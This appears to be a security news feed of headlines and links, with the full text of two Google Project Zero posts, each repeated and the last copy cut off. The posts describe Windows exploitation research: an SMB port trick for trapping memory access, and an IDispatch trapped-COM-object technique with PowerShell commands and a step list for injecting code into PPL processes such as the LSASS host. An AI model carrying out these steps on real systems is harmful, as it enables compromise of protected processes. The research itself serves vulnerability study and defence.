Cisco’s Fran Katsoudas on the company’s next big ambition for positive global change, and the importance of resilience for countries and communities. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m01/building-resilience-in-tech-skills-and-security.html
Küberturvalisuse aastaraamat: mõjuga intsidentide arv kasvas aastaga kaks korda
2025-02-03T16:48:39Z | 1738601319

Riigi Infosüsteemi Ameti (RIA) andmeil toimus Eestis eelmisel aastal 6515 mõjuga küberintsidenti ehk umbes kaks korda rohkem kui 2023. aastal, selgub äsja ilmunud küberturvalisuse aastaraamatust.

https://ria.ee/uudised/kuberturvalisuse-aastaraamat-mojuga-intsidentide-arv-kasvas-aastaga-kaks-korda
Die KI-Schockwelle: Wie der kometenhafte Aufstieg von DeepSeek die Chatbot-Landschaft in Unternehmen umgestaltet
2025-02-03T13:00:30Z | 1738587630

DeepSeek, a Chinese artificial intelligence startup founded in 2023, has experienced a meteoric rise in popularity over the past week.... The post The AI Shockwave: How DeepSeek’s Meteoric Rise is Reshaping the Enterprise Chatbot Landscape appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/how-deepseek-is-reshaping-the-enterprise-chatbot-landscape.html
Harnessing Artificial Intelligence for a Superior Web Application Firewall
2025-02-03T13:00:00Z | 1738587600

https://www.akamai.com/blog/security/2025/feb/harnessing-artificial-intelligence-for-superior-web-application-firewall
Cache Hit Ratio: The Key Metric for Happier Users and Lower Expenses
2025-02-03T13:00:00Z | 1738587600

https://www.akamai.com/blog/edge/2025/feb/the-key-metric-for-happier-users
Security Alert (A25-02-01): Vulnerability in Google Chrome
2025-02-03T04:00:00Z | 1738555200

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-02-02): Vulnerability in Microsoft Edge
2025-02-03T04:00:00Z | 1738555200

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Exploit Development: Investigating Kernel Mode Shadow Stacks on Windows
2025-02-03T00:00:00Z | 1738540800

Using SourcePoint's JTAG debugger to investigate the implementation of Intel CET Shadow Stacks in kernel-mode on Windows

/km-shadow-stacks/
Data protection: the vital need to orchestrate email encryption
2025-01-31T15:50:43Z | 1738338643

According to the Microsoft Digital Defense Report 2024, Microsoft customers experience more than 600 million attacks daily, often initiated via phishing or social engineering. Ransomware attacks have increased almost threefold. And although attacks that feature a data encryption stage have fallen by two thirds, these... The post Data protection: the vital need to orchestrate email encryption appeared first on Stormshield.

https://www.stormshield.com/news/data-protection-the-vital-need-to-orchestrate-email-encryption/
X Phishing | Campaign Targeting High Profile Accounts Returns, Promoting Crypto Scams
2025-01-31T14:55:46Z | 1738335346

SentinelLABS has observed an active phishing campaign targeting high-profile X accounts to hijack and exploit them for fraudulent activity.

https://www.sentinelone.com/labs/phishing-on-x-high-profile-account-targeting-campaign-returns/
How scammers are exploiting DeepSeek's rise
2025-01-31T13:51:07Z | 1738331467

As is their wont, cybercriminals waste no time launching attacks that aim to cash in on the frenzy around the latest big thing – plus, what else to know before using DeepSeek

https://www.welivesecurity.com/en/cybersecurity/scammers-exploiting-deepseek-hype/
Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update)
2025-01-30T17:57:00Z | 1738259820

Posted by James Forshaw, Google Project Zero Back in 2021 I wrote a blog post about various ways you can build a virtual memory access trap primitive on Windows. The goal was to cause a reader or writer of a virtual memory address to halt for a significant (e.g. 1 or more seconds) amount of time, generally for the purpose of exploiting TOCTOU memory access bugs in the kernel. The solutions proposed in the blog post were to either map an SMB file on a remote server, or abuse the Cloud Filter API. This blog isn't going to provide new solutions, instead I wanted to highlight a new feature of Windows 11 24H2 that introduces the ability to abuse the SMB file server directly on the local machine, no remote server required. This change also introduces the ability to locally exploit vulnerabilities which are of the so-called "False File Immutability" bug class.All Change Please The change was first made public, at least as far as I know, in this blog post. Microsoft's blog post described this change in Windows Insider previews, however it has subsequently shipped in Windows 11 24H2 which is generally available. The TL;DR; is the SMB client on Windows now supports specifying the destination TCP port from the command line's net command. For example, you can force the SMB client to use port 12345 through the command net use \\localhost\c$ /TCPPORT:12345. Now accessing the UNC path \\localhost\c$\blah will connect through port 12345 instead of the old, fixed port of 445. This feature works from any user, administrator access is not required as it only affects the current user's logon session. The problem encountered in the previous blog post was you couldn't bind your fake SMB server to port 445 without shutting down the local SMB server. Shutting down the server can only be done as an administrator, defeating most of the point of the exploitation trick. By changing the client port to one which isn't currently in use, we can open files via our fake SMB server and perform the delay locally without needing to use the Cloud Filter API. This still won't allow the technique to work in a sandbox fortunately. Note, that an administrator can disable this feature through Group Policy, but it is enabled by default and non-enterprise users are never likely to change that. I personally think making it enabled by default is a mistake that will come back to cause problems for Windows going forward. I've updated the example fake SMB server to allow you to bind to a different port so that you can perform the attack locally. Hopefully someone finds it useful.

https://googleprojectzero.blogspot.com/2025/01/windows-exploitation-tricks-trapping.html
Windows Bug Class: Accessing Trapped COM Objects with IDispatch
2025-01-30T17:57:00Z | 1738259820

Posted by James Forshaw, Google Project Zero Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server. This flexibility has a number of downsides, one of which is the topic of this blog, the trapped object bug class. Not all objects which can be remoted are necessarily safe to do so. For example, the previously mentioned XML libraries, in both COM and .NET, support executing arbitrary script code in the context of an XSLT document. If an XML document object is made accessible over the boundary, then the client could execute code in the context of the server process, which can result in privilege escalation or remote-code execution. There are a number of scenarios that can introduce this bug class. The most common is where an unsafe object is shared inadvertently. An example of this was CVE-2019-0555. This bug was introduced because when developing the Windows Runtime libraries an XML document object was needed. The developers decided to add some code to the existing XML DOM Document v6 COM object which exposed the runtime specific interfaces. As these runtime interfaces didn't support the XSLT scripting feature, the assumption was this was safe to expose across privilege boundaries. Unfortunately a malicious client could query for the old IXMLDOMDocument interface which was still accessible and use it to run an XSLT script and escape a sandbox. Another scenario is where there exists an asynchronous marshaling primitive. This is where an object can be marshaled both by value and by reference and the platform chooses by reference as the default mechanism, For example the FileInfo and DirectoryInfo .NET classes are both serializable, so can be sent to a .NET remoting service marshaled by value. But they also derive from the MarshalByRefObject class, which means they can be marshaled by reference. An attacker can leverage this by sending to the server a serialized form of the object which when deserialized will create a new instance of the object in the server's process. If the attacker can read back the created object, the runtime will marshal it back to the attacker by reference, leaving the object trapped in the server process. Finally the attacker can call methods on the object, such as creating new files which will execute with the privileges of the server. This attack is implemented in my ExploitRemotingService tool. The final scenario I'll mention as it has the most relevancy to this blog post is abusing the built in mechanisms the remoting technology uses to lookup and instantiate objects to create an unexpected object. For example, in COM if you can find a code path to call the CoCreateInstance API with an arbitrary CLSID and get that object passed back to the client then you can use it to run arbitrary code in the context of the server. An example of this form is CVE-2017-0211, which was a bug which exposed a Structured Storage object across a security boundary. The storage object supports the IPropertyBag interface which can be used to create an arbitrary COM object in the context of the server and get it returned to the client. This could be exploited by getting an XML DOM Document object created in the server, returned to the client marshaled by reference and then using the XSLT scripting feature to run arbitrary code in the context of the server to elevate privileges.Where Does IDispatch Fits In? The IDispatch interface is part of the OLE Automation feature, which was one of the original use cases for COM. It allows for late binding of a COM client to a server, so that the object can be consumed from scripting languages such as VBA and JScript. The interface is fully supported across process and privilege boundaries, although it's more commonly used for in-process components such as ActiveX. To facilitate calling a COM object at runtime the server must expose some type information to the client so that it knows how to package up parameters to send via the interface's Invoke method. The type information is stored in a developer-defined Type Library file on disk, and the library can be queried by the client using the IDispatch interface's GetTypeInfo method. As the COM implementation of the type library interface is marshaled by reference, the returned ITypeInfo interface is trapped in the server and any methods called upon it will execute in the server's context. The ITypeInfo interface exposes two interesting methods that can be called by a client, Invoke and CreateInstance. It turns out Invoke is not that useful for our purposes, as it's not supported for remoting, it can only be called if the type library is loaded in the current process. However, CreateInstance is implemented as remotable, this will instantiate a COM object from a CLSID by calling CoCreateInstance. Crucially the created object will be in the server's process, not the client. However, if you look at the linked API documentation there is no CLSID parameter you can pass to CreateInstance, so how does the type library interface know what object to create? The ITypeInfo interface represents any type which can be present in a type library. The type returned by GetTypeInfo just contains information about the interface the client wants to call, therefore calling CreateInstance will just return an error. However, the type library can also store information of "CoClass" types. These types define the CLSID of the object to create, and so calling CreateInstance will succeed. How can we go from the interface type information object, to one representing a class? The ITypeInfo interface provides us with the GetContainingTypeLib method which returns a reference to the containing ITypeLib interface. That can then be used to enumerate all supported classes in the type library. It's possible one or more of the classes are not safe if exposed remotely. Let's go through a worked example using my OleView.NET PowerShell module, first we want to find some target COM services which also support IDispatch. This will give us potential routes for privilege escalation. PS> $cls = Get-ComClass -Service PS> $cls | % { Get-ComInterface -Class $_ | Out-Null } PS> $cls | ? { $true -in $_.Interfaces.InterfaceEntry.IsDispatch } |          Select Name, Clsid Name                                       Clsid ----                                       ----- WaaSRemediation                            72566e27-1abb-4eb3-b4f0-eb431cb1cb32 Search Gathering Manager                   9e175b68-f52a-11d8-b9a5-505054503030 Search Gatherer Notification               9e175b6d-f52a-11d8-b9a5-505054503030 AutomaticUpdates                           bfe18e9c-6d87-4450-b37c-e02f0b373803 Microsoft.SyncShare.SyncShareFactory Class da1c0281-456b-4f14-a46d-8ed2e21a866f The -Service switch for Get-ComClass returns classes which are implemented in local services. We then query for all the supported interfaces, we don't need the output from this command as the queried interfaces are stored in the Interfaces property. Finally we select out any COM class which exposes IDispatch resulting in 5 candidates. Next, we'll pick the first class, WaasRemediation and inspect its type library for interesting classes. PS> $obj = New-ComObject -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32 PS> $lib = Import-ComTypeLib -Object $obj PS> Get-ComObjRef $lib.Instance | Select ProcessId, ProcessName ProcessId ProcessName --------- -----------     27020 svchost.exe PS> $parsed = $lib.Parse() PS> $parsed Name               Version TypeLibId ----               -------- --------- WaaSRemediationLib 1.0      3ff1aab8-f3d8-11d4-825d-00104b3646c0 PS> $parsed.Classes | Select Name, Uuid Name                          Uuid ----                          ---- WaaSRemediationAgent          72566e27-1abb-4eb3-b4f0-eb431cb1cb32 WaaSProtectedSettingsProvider 9ea82395-e31b-41ca-8df7-ec1cee7194df The script creates the COM object and then uses the Import-ComTypeLib command to get the type library interface. We can check that the type library interface is really running out of process by marshaling it with Get-ComObjRef then extracting the process information, showing it running in an instance of svchost.exe which is the shared service executable. Inspecting the type library through the interface is painful, to make it easier to display what classes are supported, we can parse the library into an easier to use object model with the Parse method. We can then dump information about the library, including a list of its classes. Unfortunately for this COM object the only classes the type library supports are already registered to run in the service and so we've gained nothing. What we need is a class that is only registered to run in the local process, but is exposed by the type library. This is a possibility as a type library could be shared by both local in-process components and an out-of-process service. I inspected the other 4 COM classes (one of which is incorrectly registered and isn't exposed by the corresponding service) and found no useful classes to try and exploit. You might decide to give up at this point, but it turns out there are some classes accessible, they're just hidden. This is because a type library can reference other type libraries, which can be inspected using the same set of interfaces. Let's take a look: PS> $parsed.ReferencedTypeLibs Name   Version TypeLibId ----   ------- --------- stdole 2.0     00020430-0000-0000-c000-000000000046 PS> $parsed.ReferencedTypeLibs[0].Parse().Classes | Select Name, Uuid Name       Uuid ----       ---- StdFont    0be35203-8f91-11ce-9de3-00aa004bb851 StdPicture 0be35204-8f91-11ce-9de3-00aa004bb851 PS> $cls = Get-ComClass -Clsid 0be35203-8f91-11ce-9de3-00aa004bb851 PS> $cls.Servers            Key Value            --- ----- InProcServer32 C:\Windows\System32\oleaut32.dll In the example we can use the ReferencedTypeLibs property to show what type libraries were encountered when the library was parsed. We can see a single entry for the stdole which is basically always going to be imported. If you're lucky, maybe there's other libraries that are imported that you can inspect. We can parse the stdole library to inspect its list of classes. There's two classes that are exported by the type library, if we inspect the servers for StdFont we can see that it is only specified to be creatable in process, we now have a target class to look for bugs. To get an out of process interface for the stdole type library we need to find a type which references it. The reason for the reference is that common interfaces such as IUnknown and IDispatch are defined in the library, so we need to query the base type of an interface we can directly access.  Let's try to create the object in the COM service. PS> $iid = $parsed.Interfaces[0].Uuid PS> $ti = $lib.GetTypeInfoOfGuid($iid) PS> $href = $ti.GetRefTypeOfImplType(0) PS> $base = $ti.GetRefTypeInfo($href) PS> $stdole = $base.GetContainingTypeLib() PS> $stdole.Parse() Name   Version TypeLibId ----   ------- --------- stdole 2.0     00020430-0000-0000-c000-000000000046 PS> $ti = $stdole.GetTypeInfoOfGuid("0be35203-8f91-11ce-9de3-00aa004bb851") PS> $font = $ti.CreateInstance() PS> Get-ComObjRef $font | Select ProcessId, ProcessName ProcessId ProcessName --------- -----------     27020 svchost.exe PS>  Get-ComInterface -Object $Obj Name                 IID                                  HasProxy   HasTypeLib ----                 ---                                  --------   ---------- ... IFont                bef6e002-a874-101a-8bba-00aa00300cab True       False IFontDisp            bef6e003-a874-101a-8bba-00aa00300cab True       True We query the base type of an existing interface through a combination of GetRefTypeOfImplType and GetRefTypeInfo, then use GetContainingTypeLib to get the referenced type library interface. We can parse the library to be confident that we've got the stdole library. Next we get the type info for the StdFont class and call CreateInstance. We can inspect the object's process to ensure it was created out of process, the results shows its trapped in the service process. As a final check we can query for the object's interfaces to prove that it's a font object. Now we just need to find a way of exploiting one of these two classes, the first problem is only the StdFont object can be accessed. The StdPicture object does a check to prevent it being used out of process. I couldn't find useful exploitable behavior in the font object, but I didn't spend too much time looking. Of course, if anyone else wants to look for a suitable bug in the class then go ahead. This research was therefore at a dead end, at least as far as system services go. There might be some COM server accessible from a sandbox but an initial analysis of ones accessible from AppContainer didn't show any obvious candidates. However, after thinking a bit more about this I realized it could be useful as an injection technique into a process running at the same privilege level. For example, we could hijack the COM registration for StdFont, to point to any other class using the TreatAs registry key. This other class would be something exploitable, such as loading the JScript engine into the target process and running a script. Still, injection techniques are not something I'd usually discuss on this blog, that's more in the realm of malware. However, there is a scenario where it might have interesting security implications. What if we could use this to inject into a Windows Protected Process? In a strange twist of fate, the WaaSRemediationAgent class we've just been inspecting might just be our ticket to ride: PS> $cls = Get-ComClass -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32 PS> $cls.AppIDEntry.ServiceProtectionLevel WindowsLight When we inspect the protection level for the hosting service it's configured to run at the PPL-Windows level! Let's see if we can salvage some value out of this research.Protected Process Injection I've blogged (and presented) on the topic of injecting into Windows Protected Processes before. I'd recommend re-reading that blog post to get a better background of previous injection attacks. However, one key point is that Microsoft does not consider PPL a security boundary and so they won't generally fix any bugs in a security bulletin in a timely manner, but they might choose to fix it in a new version of Windows. The idea is simple, we'll redirect the StdFont class registration to point to another class so that when we create it via the type library it'll be running the protected process. Choosing to use StdFont should be more generic as we could move to using a different COM server if WaaSRemediationAgent is removed. We just need a suitable class which gets us arbitrary code execution which also works in a protected process. Unfortunately this immediately rules out any of the scripting engines like JScript. If you've re-read my last blog post, the Code Integrity module explicitly blocks the common script engines from loading in a protected process. Instead, I need a class which is accessible out of process and can be loaded into a protected process. I realized one option is to load a registered .NET COM class. I've blogged about how .NET DCOM is exploitable, and shouldn't be used, but in this case we want the buggyness. The blog post discussed exploiting serialization primitives, however there was a much simpler attack which I exploited by using the System.Type class over DCOM. With access to a Type object you could perform arbitrary reflection and call any method you liked, including loading an assembly from a byte array which would bypass the signature checking and give full control over the protected process. Microsoft fixed this behavior, but they left a configuration value, AllowDCOMReflection, which allows you to turn it back on again. As we're not elevating privileges, and we have to be running as an administrator to change the COM class registration information, we can just enable DCOM reflection in the registry by writing the AllowDCOMReflection with the DWORD value of 1 to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework key before loading the .NET framework into the protected process. The following steps need to be taken to achieve injection:Enable DCOM reflection in the registry.Add the TreatAs key to redirect StdFont to the System.Object COM class.Create the WaaSRemediationAgent object. Use the type library to get the StdFont class type info.Create a StdFont object using the CreateInstance method which will really load the .NET framework and return an instance of the System.Object class.Use .NET reflection to call the System.Reflection.Assembly::Load method with a byte array.Create an object in the loaded assembly to force code to execute.Cleanup all registry changes. You'll need to do these steps in a non .NET language as otherwise the serialization mechanisms will kick in and recreate the reflection objects in the calling process. I wrote my PoC in C++, but you can probably do it from things like Python if you're so inclined. I'm not going to make the PoC available but the code is very similar to the exploit I wrote for CVE-2014-0257, that'll give you an example of how to use DCOM reflection in C++. Also note that the default for .NET COM objects is to run them using the v2 framework which is no longer installed by default. Rather than mess around with getting this working with v4 I just installed v2 from the Windows components installer. My PoC worked first-time on Windows 10, but unfortunately when I ran it on Windows 11 24H2 it failed. I could create the .NET object, but calling any method on the object failed with the error TYPE_E_CANTLOADLIBRARY. I could have stopped here, having proven my point but I wanted to know what was failing on Windows 11. Lets finish up with diving into that, to see if we could do something to get it to work on the latest version of Windows.The Problem with Windows 11 I was able to prove that the issue was related to protected processes, if I changed the service registration to run unprotected then the PoC worked. Therefore there must be something blocking the loading of the library when specifically running in a protected process. This didn't seem to impact type libraries generally, the loading of stdole worked just fine, so it was something specific to .NET. After inspecting the behavior of the PoC with Process Monitor it was clear the mscorlib.tlb library was being loaded to implement the stub class in the server. For some reason it failed to load, which prevented the stub from being created, which in turn caused any call to fail. At this point I had an idea of what's happening. In the previous blog post I discussed attacking the NGEN COM process by modifying the type library it used to create the interface stub to introduce a type-confusion. This allowed me to overwrite the KnownDlls handle and force an arbitrary DLL to get loaded into memory. I knew from the work of Clément Labro and others that most of the attacks around KnownDlls are now blocked, but I suspected that there was also some sort of fix for the type library type-confusion trick. Digging into oleaut32.dll I found the offending fix, the VerifyTrust method is shown below: NTSTATUS VerifyTrust(LoadInfo *load_info) {   PS_PROTECTION protection;   BOOL is_protected;     CheckProtectedProcessForHardening(&is_protected, &protection);   if (!is_protected)     return SUCCESS;   ULONG flags;   BYTE level;   HANDLE handle = load_info->Handle;   NTSTATUS status = NtGetCachedSigningLevel(handle, &flags, &level,                                              NULL, NULL, NULL);   if (FAILED(status) ||       (flags & 0x182) == 0 ||       FAILED(NtCompareSigningLevels(level, 12))) {     status = NtSetCachedSigningLevel(0x804, 12, &handle, 1, handle);   }   return status; } This method is called during the loading of the type library. It's using the cached signing level, again something I mentioned in the previous blog post, to verify if the file has a signing level of 12, which corresponds to Windows signing level. If it doesn't have the appropriate cached signing level the code will try to use NtSetCachedSigningLevel to set it. If that fails it assumes the file can't be loaded in the protected process and returns the error, which results in the type library failing to load. Note, a similar fix blocks the abuse of the Running Object Table to reference an out-of-process type library, but that's not relevant to this discussion. Based on the output from Get-AuthenticodeSignature the mscorlib.tlb file is signed, admittedly with a catalog signing. The signing certificate is Microsoft Windows Production PCA 2011 which is exactly the same certificate as the .NET Runtime DLL so there should be no reason it wouldn't get a Windows signing level. Let's try and set the cached signature level manually using my NtObjectManager PowerShell module to see if we get any insights: PS> $path = "C:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb" PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path Exception calling "SetCachedSigningLevel" with "4" argument(s): "(0xC000007B) - {Bad Image} %hs is either not designed to run on Windows or it contains an error. Try installing the program again using the original installation media or contact your system administrator or the software vendor for support. Error status 0x" PS> Format-HexDump $path -Length 64 -ShowAll           00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF ----------------------------------------------------------------------------- 00000000: 4D 53 46 54 02 00 01 00 00 00 00 00 09 04 00 00  - MSFT............ 00000010: 00 00 00 00 43 00 00 00 02 00 04 00 00 00 00 00  - ....C........... 00000020: 25 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - %............... 00000030: 2E 0D 00 00 33 FA 00 00 F8 08 01 00 FF FF FF FF  - ....3........... Setting the signing level gives us the STATUS_INVALID_IMAGE_FORMAT error. Looking at the first 64 bytes of type library file shows that it's a raw type library rather than packaged in a PE file. This is fairly uncommon on Windows, even when a file has the extension TLB it's common for the type library to still be packed into a PE file as a resource. I guess we're out of luck, unless we can set a cached signing level on the file, it will be blocked from loading into the protected process and we need it to load to support the stub class to call the .NET interfaces over DCOM. As an aside, oddly I have a VM of Windows 11 with the non-DLL form of the type library which does work to set a cached signing level. I must have changed the VM's configuration in some way to support this feature, but I've no idea what that is and I've decided not to dig further into it. We could try and find a previous version of the type library file which is both validly signed, and is packaged in a PE file, however, I'd rather not do that. Of course there's almost certainly another COM object we could load rather than .NET which might give us arbitrary code execution but I'd set my heart on this approach. In the end the solution was simpler than I expected, for some reason the 32 bit version of the type library file (i.e. in Framework rather than Framework64) is packed in a DLL, and we can set a cached signing level on it. PS> $path = "C:\windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb" PS> Format-HexDump $path -Length 64 -ShowAll           00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF ----------------------------------------------------------------------------- 00000000: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  - MZ.............. 00000010: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  - ........@....... 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 B8 00 00 00  - ................ PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path PS> Get-NtCachedSigningLevel $path -Win32Path Flags               : TrustedSignature SigningLevel        : Windows Thumbprint          : B9590CE5B1B3F377EAA6F455574C977919BB785F12A444BEB2... ThumbprintBytes     : {185, 89, 12, 229...} ThumbprintAlgorithm : Sha256 Thus to exploit on Windows 11 24H2 we can swap the type library registration path from the 64 bit version to the 32 bit version and rerun the exploit. The VerifyTrust function will automatically set the cached signing level for us so we don't need to do anything to make it work. Even though it's technically a different version of the type library, it doesn't make any difference for our use case and the stub generator code doesn't care. Conclusions I discussed in this blog post an interesting type of bug class on Windows, although it is applicable to any similar object-orientated remoting cross process or remoting protocol. It shows how you can get a COM object trapped in a more privileged process by exploiting a feature of OLE Automation, specifically the IDispatch interface and type libraries. While I wasn't able to demonstrate a privilege escalation, I showed how you can use the IDispatch interface exposed by the WaaSRemediationAgent class to inject code into a PPL-Windows process. While this isn't the highest possible protection level it allows access to the majority of processes running protected including LSASS. We saw that Microsoft has done some work to try and mitigate existing attacks such as type library type-confusions, but in our case this mitigation shouldn't have blocked the load as we didn't need to change the type library itself. While the attack required admin privilege, the general technique does not. You could modify the local user's registration for COM and .NET to do the attack as a normal user to inject into a PPL if you can find a suitable COM server exposing IDispatch.

https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html
Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update)
2025-01-30T17:57:00Z | 1738259820

Posted by James Forshaw, Google Project Zero Back in 2021 I wrote a blog post about various ways you can build a virtual memory access trap primitive on Windows. The goal was to cause a reader or writer of a virtual memory address to halt for a significant (e.g. 1 or more seconds) amount of time, generally for the purpose of exploiting TOCTOU memory access bugs in the kernel. The solutions proposed in the blog post were to either map an SMB file on a remote server, or abuse the Cloud Filter API. This blog isn't going to provide new solutions, instead I wanted to highlight a new feature of Windows 11 24H2 that introduces the ability to abuse the SMB file server directly on the local machine, no remote server required. This change also introduces the ability to locally exploit vulnerabilities which are of the so-called "False File Immutability" bug class.All Change Please The change was first made public, at least as far as I know, in this blog post. Microsoft's blog post described this change in Windows Insider previews, however it has subsequently shipped in Windows 11 24H2 which is generally available. The TL;DR; is the SMB client on Windows now supports specifying the destination TCP port from the command line's net command. For example, you can force the SMB client to use port 12345 through the command net use \\localhost\c$ /TCPPORT:12345. Now accessing the UNC path \\localhost\c$\blah will connect through port 12345 instead of the old, fixed port of 445. This feature works from any user, administrator access is not required as it only affects the current user's logon session. The problem encountered in the previous blog post was you couldn't bind your fake SMB server to port 445 without shutting down the local SMB server. Shutting down the server can only be done as an administrator, defeating most of the point of the exploitation trick. By changing the client port to one which isn't currently in use, we can open files via our fake SMB server and perform the delay locally without needing to use the Cloud Filter API. This still won't allow the technique to work in a sandbox fortunately. Note, that an administrator can disable this feature through Group Policy, but it is enabled by default and non-enterprise users are never likely to change that. I personally think making it enabled by default is a mistake that will come back to cause problems for Windows going forward. I've updated the example fake SMB server to allow you to bind to a different port so that you can perform the attack locally. Hopefully someone finds it useful.

https://googleprojectzero.blogspot.com/2025/01/windows-exploitation-tricks-trapping.html
Windows Bug Class: Accessing Trapped COM Objects with IDispatch
2025-01-30T17:57:00Z | 1738259820

Posted by James Forshaw, Google Project Zero Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server. This flexibility has a number of downsides, one of which is the topic of this blog, the trapped object bug class. Not all objects which can be remoted are necessarily safe to do so. For example, the previously mentioned XML libraries, in both COM and .NET, support executing arbitrary script code in the context of an XSLT document. If an XML document object is made accessible over the boundary, then the client could execute code in the context of the server process, which can result in privilege escalation or remote-code execution. There are a number of scenarios that can introduce this bug class. The most common is where an unsafe object is shared inadvertently. An example of this was CVE-2019-0555. This bug was introduced because when developing the Windows Runtime libraries an XML document object was needed. The developers decided to add some code to the existing XML DOM Document v6 COM object which exposed the runtime specific interfaces. As these runtime interfaces didn't support the XSLT scripting feature, the assumption was this was safe to expose across privilege boundaries. Unfortunately a malicious client could query for the old IXMLDOMDocument interface which was still accessible and use it to run an XSLT script and escape a sandbox. Another scenario is where there exists an asynchronous marshaling primitive. This is where an object can be marshaled both by value and by reference and the platform chooses by reference as the default mechanism, For example the FileInfo and DirectoryInfo .NET classes are both serializable, so can be sent to a .NET remoting service marshaled by value. But they also derive from the MarshalByRefObject class, which means they can be marshaled by reference. An attacker can leverage this by sending to the server a serialized form of the object which when deserialized will create a new instance of the object in the server's process. If the attacker can read back the created object, the runtime will marshal it back to the attacker by reference, leaving the object trapped in the server process. Finally the attacker can call methods on the object, such as creating new files which will execute with the privileges of the server. This attack is implemented in my ExploitRemotingService tool. The final scenario I'll mention as it has the most relevancy to this blog post is abusing the built in mechanisms the remoting technology uses to lookup and instantiate objects to create an unexpected object. For example, in COM if you can find a code path to call the CoCreateInstance API with an arbitrary CLSID and get that object passed back to the client then you can use it to run arbitrary code in the context of the server. An example of this form is CVE-2017-0211, which was a bug which exposed a Structured Storage object across a security boundary. The storage object supports the IPropertyBag interface which can be used to create an arbitrary COM object in the context of the server and get it returned to the client. This could be exploited by getting an XML DOM Document object created in the server, returned to the client marshaled by reference and then using the XSLT scripting feature to run arbitrary code in the context of the server to elevate privileges.Where Does IDispatch Fits In? The IDispatch interface is part of the OLE Automation feature, which was one of the original use cases for COM. It allows for late binding of a COM client to a server, so that the object can be consumed from scripting languages such as VBA and JScript. The interface is fully supported across process and privilege boundaries, although it's more commonly used for in-process components such as ActiveX. To facilitate calling a COM object at runtime the server must expose some type information to the client so that it knows how to package up parameters to send via the interface's Invoke method. The type information is stored in a developer-defined Type Library file on disk, and the library can be queried by the client using the IDispatch interface's GetTypeInfo method. As the COM implementation of the type library interface is marshaled by reference, the returned ITypeInfo interface is trapped in the server and any methods called upon it will execute in the server's context. The ITypeInfo interface exposes two interesting methods that can be called by a client, Invoke and CreateInstance. It turns out Invoke is not that useful for our purposes, as it's not supported for remoting, it can only be called if the type library is loaded in the current process. However, CreateInstance is implemented as remotable, this will instantiate a COM object from a CLSID by calling CoCreateInstance. Crucially the created object will be in the server's process, not the client. However, if you look at the linked API documentation there is no CLSID parameter you can pass to CreateInstance, so how does the type library interface know what object to create? The ITypeInfo interface represents any type which can be present in a type library. The type returned by GetTypeInfo just contains information about the interface the client wants to call, therefore calling CreateInstance will just return an error. However, the type library can also store information of "CoClass" types. These types define the CLSID of the object to create, and so calling CreateInstance will succeed. How can we go from the interface type information object, to one representing a class? The ITypeInfo interface provides us with the GetContainingTypeLib method which returns a reference to the containing ITypeLib interface. That can then be used to enumerate all supported classes in the type library. It's possible one or more of the classes are not safe if exposed remotely. Let's go through a worked example using my OleView.NET PowerShell module, first we want to find some target COM services which also support IDispatch. This will give us potential routes for privilege escalation. PS> $cls = Get-ComClass -Service PS> $cls | % { Get-ComInterface -Class $_ | Out-Null } PS> $cls | ? { $true -in $_.Interfaces.InterfaceEntry.IsDispatch } |          Select Name, Clsid Name                                       Clsid ----                                       ----- WaaSRemediation                            72566e27-1abb-4eb3-b4f0-eb431cb1cb32 Search Gathering Manager                   9e175b68-f52a-11d8-b9a5-505054503030 Search Gatherer Notification               9e175b6d-f52a-11d8-b9a5-505054503030 AutomaticUpdates                           bfe18e9c-6d87-4450-b37c-e02f0b373803 Microsoft.SyncShare.SyncShareFactory Class da1c0281-456b-4f14-a46d-8ed2e21a866f The -Service switch for Get-ComClass returns classes which are implemented in local services. We then query for all the supported interfaces, we don't need the output from this command as the queried interfaces are stored in the Interfaces property. Finally we select out any COM class which exposes IDispatch resulting in 5 candidates. Next, we'll pick the first class, WaasRemediation and inspect its type library for interesting classes. PS> $obj = New-ComObject -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32 PS> $lib = Import-ComTypeLib -Object $obj PS> Get-ComObjRef $lib.Instance | Select ProcessId, ProcessName ProcessId ProcessName --------- -----------     27020 svchost.exe PS> $parsed = $lib.Parse() PS> $parsed Name               Version TypeLibId ----               -------- --------- WaaSRemediationLib 1.0      3ff1aab8-f3d8-11d4-825d-00104b3646c0 PS> $parsed.Classes | Select Name, Uuid Name                          Uuid ----                     